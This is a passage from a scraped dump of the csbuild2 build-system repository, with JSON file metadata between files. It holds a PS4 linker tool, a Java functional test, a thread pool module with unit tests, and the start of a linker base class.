Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps4_linker\n\t:synopsis: Implementation of the PS4 linker tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .gcc_linker import GccLinker\n\nfrom ..common import FindLibraries\nfrom ..common.sony_tool_base import Ps4BaseTool\n\ndef _ignore(_):\n\tpass\n\nclass Ps4Linker(Ps4BaseTool, GccLinker):\n\t\"\"\"\n\tPS4 linker tool implementation\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"x64\" }\n\n\toutputFiles = { \".elf\", \".a\", \".prx\" }\n\tcrossProjectDependencies = { \".a\", \".prx\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPs4BaseTool.__init__(self, projectSettings)\n\t\tGccLinker.__init__(self, projectSettings)\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPs4BaseTool.SetupForProject(self, project)\n\t\tGccLinker.SetupForProject(self, project)\n\n\tdef _getOutputFiles(self, project):\n\t\toutputFilename = \"{}{}\".format(project.outputName, self._getOutputExtension(project.projectType))\n\t\toutputFullPath = os.path.join(project.outputDir, outputFilename)\n\t\toutputFiles = [outputFullPath]\n\n\t\t# For shared libraries, the linker will automatically generate stub libraries that can be linked against.\n\t\t# Note the stubs will only be generated if something in the project is being exported. 
But, since dynamic\n\t\t# loading at runtime isn't possible, such a project would be pointless, so we can assume the developer will\n\t\t# always export something.\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\toutputFiles.extend([\n\t\t\t\tos.path.join(project.outputDir, \"{}_stub.a\".format(project.outputName)),\n\t\t\t\tos.path.join(project.outputDir, \"{}_stub_weak.a\".format(project.outputName)),\n\t\t\t])\n\n\t\treturn tuple(outputFiles)\n\n\tdef _findLibraries(self, project, libs):\n\t\ttargetLibPath = os.path.join(self._ps4SdkPath, \"target\", \"lib\")\n\t\tallLibraryDirectories = list(self._libraryDirectories) + [targetLibPath]\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".prx\", \".a\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt = {\n\t\t\tcsbuild.ProjectType.Application: \".elf\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".prx\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\tdef _getBinaryLinkerName(self):\n\t\treturn os.path.join(self._ps4SdkPath, \"host_tools\", \"bin\", \"orbis-clang++.exe\")\n\n\tdef _getArchiverName(self):\n\t\treturn os.path.join(self._ps4SdkPath, \"host_tools\", \"bin\", \"orbis-ar.exe\")\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\n\t\t\t\"-fPIC\",\n\t\t\t\"-Wl,-oformat=prx\",\n\t\t\t\"-Wl,-prx-stub-output-dir={}\".format(project.outputDir)\n\t\t] if project.projectType == csbuild.ProjectType.SharedLibrary \\\n\t\t\telse []\n\t\treturn args\n\n\tdef _getLibraryPathArgs(self, project):\n\t\t_ignore(project)\n\t\treturn []\n\n\tdef _getRpathArgs(self, project):\n\t\treturn []\n\n\tdef _getLibraryArgs(self):\n\t\targs = []\n\n\t\tfor libPath in self._actualLibraryLocations.values():\n\t\t\tlibNameExt = os.path.splitext(libPath)\n\n\t\t\t# PRX libraries can't be linked directly. We have to link against their static stub libraries\n\t\t\t# that are generated when they are built.\n\t\t\tif libNameExt[1] in (\".prx\", \".sprx\"):\n\t\t\t\tlibPath = os.path.join(os.path.dirname(libPath), \"{}_stub.a\".format(os.path.basename(libNameExt[0])))\n\n\t\t\targs.append(libPath)\n\n\t\treturn args\n\n\tdef _getStartGroupArgs(self):\n\t\treturn [\"-Wl,--start-group\"]\n" }, { "alpha_fraction": 0.7389408349990845, "alphanum_fraction": 0.7417445778846741, "avg_line_length": 37.21428680419922, "blob_id": "af7e16bd454b857e808e536aeb8b455fbfe2b93b", "content_id": "26bec863395d770cbb6dfa5ba116bfd6b11f53d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3210, "license_type": "no_license", "max_line_length": 148, "num_lines": 84, "path": "/functional_tests/basic_java_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of Java tools\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild import commands\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild._utils import PlatformString\n\nimport os\nimport platform\nimport time\nimport unittest\n\ndef Touch(fname):\n\t\"\"\"\n\tTouch a file to update its modification time\n\t:param fname: Filename\n\t:type fname: str\n\t\"\"\"\n\twriteBit = 0x80\n\toldPermissions = os.stat(fname).st_mode\n\tisReadOnly = not oldPermissions & writeBit\n\tif isReadOnly:\n\t\tos.chmod(fname, oldPermissions | writeBit)\n\ttry:\n\t\twith open(fname, 'a'):\n\t\t\t# Mac has terrible filesystem time resolution, so we have to force a sleep\n\t\t\t# in order for changes to be picked up.\n\t\t\tif platform.system() == \"Darwin\":\n\t\t\t\ttime.sleep(1)\n\t\t\tos.utime(fname, None)\n\tfinally:\n\t\tif isReadOnly:\n\t\t\tos.chmod(fname, oldPermissions)\n\[email protected](\"JAVA_HOME\" in os.environ, \"JAVA_HOME not defined\")\nclass BasicJavaTest(FunctionalTest):\n\t\"\"\"Basic Java test\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tself.outputFile = \"out/hello_world.jar\"\n\t\toutDir = \"out\"\n\t\tFunctionalTest.setUp(self, outDir=outDir, cleanArgs=[\"--project=hello_world\", \"--at\", \"--toolchain=oracle-java\"])\n\n\tdef testCompileSucceeds(self):\n\t\t\"\"\"Test that the project successfully compiles\"\"\"\n\t\tself.assertIn(\"JAVA_HOME\", os.environ, \"JAVA_HOME must be defined in the environment if the Java binaries are not available from the system path\")\n\t\tjavaExe = os.path.join(os.environ[\"JAVA_HOME\"], \"bin\", \"java{}\".format(\".exe\" if platform.system() == \"Windows\" else \"\"))\n\n\t\t# Verify the Java executable can be found since it's required for running the JAR output for this test.\n\t\tself.assertFileIsExecutable(javaExe)\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\", \"--toolchain=oracle-java\")\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tret, out, _ = commands.Run([javaExe, \"-jar\", self.outputFile])\n\n\t\tself.assertEqual(ret, 0)\n\t\tself.assertEqual(out, PlatformString(\"Hello, world!\"))\n" }, { "alpha_fraction": 0.6967173218727112, "alphanum_fraction": 0.7044585943222046, "avg_line_length": 29.372024536132812, "blob_id":
"8974cfdbf62307445e439fe135b6009e021a479f", "content_id": "2dcc4cbe6d6497f102051ba13970463025f72dab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10205, "license_type": "no_license", "max_line_length": 141, "num_lines": 336, "path": "/csbuild/_utils/thread_pool.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: thread_pool\n\t:synopsis: Thread pool and task manager class for performing parallel operations\n\t\t\twith callbacks on the main thread when they are complete\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport functools\nimport sys\nimport threading\nimport inspect\n\nfrom .. import log, perf_timer\nfrom .._testing import testcase\nfrom . 
import queue\nfrom .decorators import TypeChecked\nfrom .reraise import Reraise\n\nif sys.version_info[0] >= 3:\n\tfrom collections.abc import Callable\nelse:\n\tfrom collections import Callable\n\t# pylint: disable=import-error\n\nclass ThreadedTaskException(Exception):\n\t\"\"\"\n\tWraps another exception, allowing the other exception to be caught and handled, then rethrown.\n\t\"\"\"\n\tdef __init__(self, exceptionObject, tb):\n\t\tException.__init__(self)\n\t\tself.exception = exceptionObject\n\t\tself.traceback = tb\n\n\tdef __repr__(self):\n\t\treturn \"ThreadedTaskException: (\" + type(self.exception).__name__ + \": \" + repr(self.exception) + \")\"\n\n\tdef __str__(self):\n\t\treturn \"(\" + type(self.exception).__name__ + \": \" + str(self.exception) + \")\"\n\n\tdef Reraise(self):\n\t\t\"\"\"\n\t\tReraise the wrapped exception so that\n\t\t a new set of catch statements can be prepared\n\t\t\"\"\"\n\t\tReraise(self.exception, self.traceback)\n\n\nclass ThreadPool(object):\n\t\"\"\"\n\tThread Pool and Task Management class\n\tAllows tasks to be inserted into a queue in a thread-safe way from any thread\n\tThe first available thread will then handle that task\n\n\t:param numThreads: Number of threads in the pool - must be positive\n\t:type numThreads: int\n\t:param callbackQueue: Queue to be used to pass completion callbacks back to the main thread\n\t:type callbackQueue: queue.Queue\n\t:param stopOnException: Stop processing tasks once any thread has received an exception.\n\t:type stopOnException: bool\n\t\"\"\"\n\texitEvent = object()\n\n\t@TypeChecked(numThreads=int, callbackQueue=queue.Queue, stopOnException=bool)\n\tdef __init__(self, numThreads, callbackQueue, stopOnException=True):\n\n\t\tassert numThreads > 0\n\n\t\tself.queue = queue.Queue()\n\t\tself.threads = [threading.Thread(target=self._threadRunner) for _ in range(numThreads)]\n\t\tself.callbackQueue = callbackQueue\n\t\tself.stopOnException = stopOnException\n\t\tself.excInfo = None\n\t\tself.abort = threading.Event()\n\t\t\"\"\"@type: queue.Queue\"\"\"\n\n\tdef Start(self):\n\t\t\"\"\"\n\t\tStart all threads in the pool and begin executing tasks\n\t\t\"\"\"\n\t\t_ = [t.start() for t in self.threads]\n\n\t@TypeChecked(task=(Callable, tuple, type(None)), callback=(Callable, tuple, type(None)))\n\tdef AddTask(self, task, callback):\n\t\t\"\"\"\n\t\tAdd a task into the queue to be executed on the first available thread.\n\t\tThis is safe to call from any thread, including threads currently executing tasks.\n\n\t\t:param task: Task to be executed on another thread - either a callable or a tuple of callable + args\n\t\t:type task: (Callable, *args)\n\t\t:param callback: Callback to be placed into the callback queue when this task is complete - either a callable or a tuple of callable + args\n\t\t:type callback: (Callable, *args)\n\t\t\"\"\"\n\n\t\tif isinstance(task, tuple):\n\t\t\ttask = functools.partial(task[0], *(task[1:]))\n\n\t\tif isinstance(callback, tuple):\n\t\t\tcallback = functools.partial(callback[0], *(callback[1:]))\n\n\t\tself.queue.Put((task, callback))\n\n\tdef Stop(self):\n\t\t\"\"\"\n\t\tStop and join all threads. 
All tasks currently in the queue will finish execution before it stops.\n\t\t\"\"\"\n\n\t\tfor _ in range(len(self.threads)):\n\t\t\tself.queue.Put(ThreadPool.exitEvent)\n\t\t_ = [t.join() for t in self.threads]\n\t\tself.callbackQueue.Put(ThreadPool.exitEvent)\n\n\tdef Abort(self):\n\t\t\"\"\"\n\t\tAbort execution, joining all threads without finishing the tasks in the queue.\n\t\tAnything currently executing will finish, but no new tasks will be started.\n\t\tThis function will join all threads and return once all in-progress tasks are finished and all threads have stopped.\n\t\t\"\"\"\n\t\tself.abort.set()\n\t\tfor _ in range(len(self.threads)):\n\t\t\tself.queue.Put(ThreadPool.exitEvent)\n\t\t_ = [t.join() for t in self.threads]\n\t\tself.callbackQueue.Put(ThreadPool.exitEvent)\n\n\tdef _rethrowException(self, excInfo):\n\t\tReraise(ThreadedTaskException(excInfo[1], excInfo[2]), excInfo[2])\n\n\tdef _threadRunner(self):\n\t\twhile True:\n\t\t\twith perf_timer.PerfTimer(\"Worker thread idle\"):\n\t\t\t\ttask = self.queue.GetBlocking()\n\n\t\t\tret = None\n\t\t\tif task is ThreadPool.exitEvent:\n\t\t\t\treturn\n\t\t\tif self.abort.is_set():\n\t\t\t\treturn\n\t\t\tif self.stopOnException and self.excInfo is not None:\n\t\t\t\treturn\n\n\t\t\ttry:\n\t\t\t\tif task[0]:\n\t\t\t\t\tret = task[0]()\n\t\t\texcept:\n\t\t\t\tself.excInfo = sys.exc_info()\n\n\t\t\t\tself.callbackQueue.Put(functools.partial(self._rethrowException, sys.exc_info()))\n\n\t\t\t\tif self.stopOnException:\n\t\t\t\t\tself.callbackQueue.Put(self.Stop)\n\t\t\t\t\treturn\n\n\t\t\tif task[1]:\n\t\t\t\t# Has to be nested because we have to rebind task[1] to a name in a different scope\n\t\t\t\t# Otherwise by the time this runs, task has probably changed to another value and we get invalid results\n\t\t\t\tdef _makeCallback(callback, ret):\n\t\t\t\t\tdef _callback():\n\t\t\t\t\t\tif isinstance(callback, functools.partial):\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\targspec = inspect.getfullargspec(callback)\n\t\t\t\t\t\t\texcept AttributeError:\n\t\t\t\t\t\t\t\targspec = inspect.getargspec(callback.func) # pylint: disable=deprecated-method\n\t\t\t\t\t\t\tif argspec[1]:\n\t\t\t\t\t\t\t\tnargs = -1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnargs = len(argspec[0]) - len(callback.func.args)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\targspec = inspect.getfullargspec(callback)\n\t\t\t\t\t\t\texcept AttributeError:\n\t\t\t\t\t\t\t\targspec = inspect.getargspec(callback) # pylint: disable=deprecated-method\n\t\t\t\t\t\t\tif argspec[1]:\n\t\t\t\t\t\t\t\tnargs = -1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnargs = len(argspec[0])\n\n\t\t\t\t\t\tif isinstance(ret, tuple):\n\t\t\t\t\t\t\tif nargs == -1 or nargs == len(argspec[0]):\n\t\t\t\t\t\t\t\tcallback(*ret)\n\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tif nargs == 1:\n\t\t\t\t\t\t\tcallback(ret)\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tif nargs == 0:\n\t\t\t\t\t\t\tcallback()\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\traise TypeError(\"Could not find a way to call {} with parameters {}\".format(callback, ret))\n\t\t\t\t\treturn _callback\n\n\t\t\t\tself.callbackQueue.Put(_makeCallback(task[1], ret))\n\n### Unit Tests ###\n\nclass TestThreadPool(testcase.TestCase):\n\t\"\"\"Test the thread pool\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef testThreadPool(self):\n\t\t\"\"\"Test that the thread pool works in the general case\"\"\"\n\t\timport time\n\t\timport random\n\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\t\tpool = ThreadPool(4, 
callbackQueue)\n\t\tpool.Start()\n\n\t\tclass _sharedLocals(object):\n\t\t\tcount = 0\n\t\t\titer = 0\n\t\t\tcallbackCount = 0\n\n\t\texpectedCount = 0\n\t\tlock = threading.Lock()\n\n\t\tdef _callback():\n\t\t\t_sharedLocals.callbackCount += 1\n\t\t\tif _sharedLocals.callbackCount % 100 == 0:\n\t\t\t\tlog.Info(\"{} callbacks completed.\", _sharedLocals.callbackCount)\n\t\t\tif _sharedLocals.callbackCount == 400:\n\t\t\t\tpool.Stop()\n\n\t\tdef _incrementCount2(i):\n\t\t\ttime.sleep(random.uniform(0.001, 0.0125))\n\n\t\t\t#pylint: disable=not-context-manager\n\t\t\twith lock:\n\t\t\t\t_sharedLocals.count += i\n\t\t\t\t_sharedLocals.iter += 1\n\t\t\t\tif _sharedLocals.iter % 25 == 0:\n\t\t\t\t\tlog.Info(\"{} iterations completed.\", _sharedLocals.iter)\n\n\t\tdef _incrementCount(i):\n\t\t\ttime.sleep(random.uniform(0.001, 0.0125))\n\n\t\t\t#pylint: disable=not-context-manager\n\t\t\twith lock:\n\t\t\t\t_sharedLocals.count += i\n\t\t\t\t_sharedLocals.iter += 1\n\t\t\t\tif _sharedLocals.iter % 25 == 0:\n\t\t\t\t\tlog.Info(\"{} iterations completed.\", _sharedLocals.iter)\n\t\t\tpool.AddTask((_incrementCount2, i+1), _callback)\n\n\t\tfor i in range(200):\n\t\t\tpool.AddTask((_incrementCount, i), _callback)\n\t\t\texpectedCount += i\n\t\t\texpectedCount += i + 1\n\n\t\twhile True:\n\t\t\tcb = callbackQueue.GetBlocking()\n\t\t\tif cb is ThreadPool.exitEvent:\n\t\t\t\tbreak\n\t\t\tcb()\n\n\t\tself.assertEqual(_sharedLocals.count, expectedCount)\n\t\tlog.SetCallbackQueue(None)\n\n\tdef testExceptionRethrown(self):\n\t\t\"\"\"Test that when an exception is thrown on a thread, all threads stop and that exception's rethrown on the main thread\"\"\"\n\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\t\tpool = ThreadPool(4, callbackQueue)\n\n\t\tdef _throwException():\n\t\t\traise RuntimeError(\"Exception!\")\n\n\t\tpool.AddTask(_throwException, None)\n\t\tpool.Start()\n\n\t\tcaughtException = False\n\t\twhile True:\n\t\t\tcb = callbackQueue.GetBlocking()\n\n\t\t\tif cb is ThreadPool.exitEvent:\n\t\t\t\tbreak\n\n\t\t\ttry:\n\t\t\t\tcb()\n\t\t\texcept ThreadedTaskException as e:\n\t\t\t\tself.assertTrue(isinstance(e.exception, RuntimeError))\n\t\t\t\tcaughtException = True\n\t\t\t\timport traceback\n\t\t\t\texc = traceback.format_exc()\n\t\t\t\tself.assertIn(\"_threadRunner\", exc)\n\t\t\t\tself.assertIn(\"_throwException\", exc)\n\t\t\telse:\n\t\t\t\tself.assertTrue(caughtException, \"Exception was not thrown\")\n\n\tdef testReturnValues(self):\n\t\t\"\"\"Test that a callback can take a parameter and be told about the return value from the called function\"\"\"\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\t\tpool = ThreadPool(4, callbackQueue)\n\n\t\tdef _getTwo():\n\t\t\treturn 2\n\n\t\tdef _callbackTakesArg(self, a):\n\t\t\tself.assertEqual(2, a)\n\n\t\tdef _callbackNoArg():\n\t\t\tpool.Stop()\n\n\t\tpool.AddTask(_getTwo, lambda x: _callbackTakesArg(self, x))\n\t\tpool.AddTask(_getTwo, _callbackNoArg)\n\t\tpool.Start()\n\n\t\twhile True:\n\t\t\tcb = callbackQueue.GetBlocking()\n\n\t\t\tif cb is ThreadPool.exitEvent:\n\t\t\t\tbreak\n\t\t\tcb()\n" }, { "alpha_fraction": 0.6690181493759155, "alphanum_fraction": 0.6695963740348816, "avg_line_length": 32.13026809692383, "blob_id": "ef45006864eda0d638c8353dfe1888ecef74b2b9", "content_id": "70592829c03ecbb30c168e835a353320220e3719", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8647, "license_type": "no_license", "max_line_length": 137, 
"num_lines": 261, "path": "/csbuild/tools/linkers/linker_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: linker_base\n\t:synopsis: A base class for binary linkers, as used by c++, d, assembly, etc\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nimport csbuild\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.tool_traits import HasDebugLevel, HasDebugRuntime, HasStaticRuntime\n\nfrom ... import commands, log\nfrom ..._utils import ordered_set\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\nclass LibraryError(Exception):\n\t\"\"\"\n\tRepresents an error indicating a missing library in a project.\n\t\"\"\"\n\tdef __init__(self, proj):\n\t\tself.proj = proj\n\t\tException.__init__(self)\n\n\tdef __str__(self):\n\t\treturn \"One or more libraries for project {} could not be found or were invalid.\".format(self.proj)\n\n\t__repr__ = __str__\n\n@MetaClass(ABCMeta)\nclass LinkerBase(HasDebugLevel, HasDebugRuntime, HasStaticRuntime):\n\t\"\"\"\n\tBase class for a linker\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tself._libraries = projectSettings.get(\"libraries\", ordered_set.OrderedSet())\n\t\tself._libraryDirectories = projectSettings.get(\"libraryDirectories\", ordered_set.OrderedSet())\n\t\tself._linkerFlags = projectSettings.get(\"linkerFlags\", [])\n\t\tself._rpathDirectories = projectSettings.get(\"rpathDirectories\", ordered_set.OrderedSet())\n\t\tself._actualLibraryLocations = {\n\t\t\tlibrary : library\n\t\t\tfor library in self._libraries\n\t\t}\n\n\t\tHasDebugLevel.__init__(self, projectSettings)\n\t\tHasDebugRuntime.__init__(self, projectSettings)\n\t\tHasStaticRuntime.__init__(self, projectSettings)\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tProject setup - in this case, verify libraries before running the build.\n\n\t\t:param project: Project to set up for\n\t\t:type project: project.Project\n\t\t:raises LibraryError: If a library is not 
found\n\t\t\"\"\"\n\t\tHasDebugLevel.SetupForProject(self, project)\n\t\tHasDebugRuntime.SetupForProject(self, project)\n\t\tHasStaticRuntime.SetupForProject(self, project)\n\n\t\tlog.Linker(\"Verifying libraries for {}...\", project)\n\n\t\t# Make sure all the library directory paths are absolute after the macro formatter has been run on them.\n\t\tself._libraryDirectories = ordered_set.OrderedSet(\n\t\t\t[os.path.abspath(directory) for directory in self._libraryDirectories]\n\t\t)\n\n\t\tif self._libraries:\n\t\t\tself._actualLibraryLocations = self._findLibraries(project, self._libraries)\n\n\t\t\tif self._actualLibraryLocations is None:\n\t\t\t\traise LibraryError(project)\n\n\t\tfor dependProject in project.dependencies:\n\t\t\toutputExt = self._getOutputExtension(dependProject.projectType)\n\t\t\tif outputExt is not None:\n\t\t\t\tself._actualLibraryLocations[dependProject.outputName] = \\\n\t\t\t\t\tos.path.join(\n\t\t\t\t\t\tdependProject.outputDir,\n\t\t\t\t\t\t\"{}{}\".format(dependProject.outputName, outputExt)\n\t\t\t\t\t)\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef AddLibraries(*libs):\n\t\t\"\"\"\n\t\tAdd libraries to be linked against. These can be provided as either 'foo' or 'libfoo.a'/'libfoo.lib'\n\t\tas is appropriate for the platform.\n\n\t\t:param libs: List of libraries\n\t\t:type libs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"libraries\", libs)\n\n\t@staticmethod\n\tdef AddLibraryDirectories(*dirs):\n\t\t\"\"\"\n\t\tAdd directories to look for libraries in\n\n\t\t:param dirs: Directories to scan\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"libraryDirectories\", list(dirs))\n\n\t@staticmethod\n\tdef AddLinkerFlags(*flags):\n\t\t\"\"\"\n\t\tAdd linker flags.\n\n\t\t:param flags: List of linker flags.\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"linkerFlags\", flags)\n\n\t@staticmethod\n\tdef AddRpathDirectories(*dirs):\n\t\t\"\"\"\n\t\tAdd directories to include in the linked output's RPATH.\n\n\t\t:param dirs: RPATH directory paths\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"rpathDirectories\", list(dirs))\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project):\n\t\t\"\"\"\n\t\tGet the set of output files that will be created from linking a project\n\n\t\t:param project: project being linked\n\t\t:type project: project.Project\n\t\t:return: tuple of files that will be produced from linking\n\t\t:rtype: tuple[str]\n\t\t\"\"\"\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFiles):\n\t\t\"\"\"\n\t\tGet the command to link the provided set of files for the provided project\n\n\t\t:param project: Project to link\n\t\t:type project: project.Project\n\t\t:param inputFiles: files being linked\n\t\t:type inputFiles: 
input_file.InputFile\n\t\t:return: Command to execute, broken into a list, as would be provided to subprocess functions\n\t\t:rtype: list\n\t\t\"\"\"\n\t\treturn []\n\n\t@abstractmethod\n\tdef _findLibraries(self, project, libs):\n\t\t\"\"\"\n\t\tSearch for the provided set of libraries, verify they exist, and map them to their actual file locations.\n\n\t\t:param project: Project searching for libraries.\n\t\t:type project: :class:`csbuild._build.project.Project`\n\n\t\t:param libs: Libraries to search for.\n\t\t:type libs: str\n\n\t\t:return: Map of input string to actual absolute path to the library.\n\t\t:rtype: dict[str, str]\n\t\t\"\"\"\n\t\treturn {}\n\n\t@abstractmethod\n\tdef _getOutputExtension(self, projectType):\n\t\t\"\"\"\n\t\tGet the output extension for a given project type\n\n\t\t:param projectType: the project type\n\t\t:type projectType: csbuild.ProjectType\n\t\t:return: the extension, including the dot\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn \"\"\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\t\"\"\"\n\t\tExecute a group build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use 